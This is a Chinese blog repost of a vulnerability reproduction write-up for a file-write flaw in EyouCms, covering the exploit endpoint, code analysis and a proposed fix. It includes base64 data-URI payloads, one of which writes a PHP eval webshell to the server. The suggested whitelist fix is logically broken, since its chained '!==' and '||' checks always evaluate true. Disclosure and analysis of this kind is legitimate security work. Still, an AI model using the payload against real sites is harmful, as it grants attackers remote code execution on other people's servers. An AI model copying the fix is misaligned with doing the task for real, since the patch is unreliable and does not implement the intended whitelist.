专注于分享seo思维和sem网络营销的园林绿化SEO博客
顶部右侧自定义文字
aliyun-1212-large.jpg
aliyun-1212-large.jpg

网站首页 个人杂记 正文

EyouCms前台GetShell漏洞复现

2021-05-05 个人杂记 355 ℃ 0 评论
广告位 后台主题配置管理

文章源自【字节脉搏社区】-字节脉搏实验室

作者-Beginners

0x01 EyouCms前台GetShell漏洞复现

EyouCms是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)

0x02 漏洞复现:

利用路径:

/index.php/api/Uploadify/preview

POST数据构造:

data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

直接访问:/preview/文件名.php

测试写入Shell:

data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs=

0x03 代码分析:

漏洞文件:applicationapicontrollerUploadify.php

漏洞触发函数:preview()

获取POST构造输入的数据,在利用preg_match()获取其中文件后缀和Base64编码数据赋值于$matches;

把获取的Base64编码数据$matches[2]和文件后缀$matches[1]拼接为文件名$filename;

判断文件是否存在,若不存在则$Base64进行base64解码后通过file_put_contents()写入文件中后输出$filename(文件名);到/preview/目录下;

0x04 漏洞修复:

使用白名单判断文件名后缀;

在Uploadify.php中213行到214行的代码修改为如下:

if ($type !== 'jpeg' || $type !=='png' || $type !=='gif' || $type!=='jpg') {

exit();

}

0x05 Cms下载地址:

下载地址:

https://share.weiyun.com/DGjtKLuR


Tags:

请在这里放置你的在线分享代码
广告位 后台主题配置管理

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

«   2021年7月   »
1234
567891011
12131415161718
19202122232425
262728293031
标签列表
aliyun-1212-large.jpg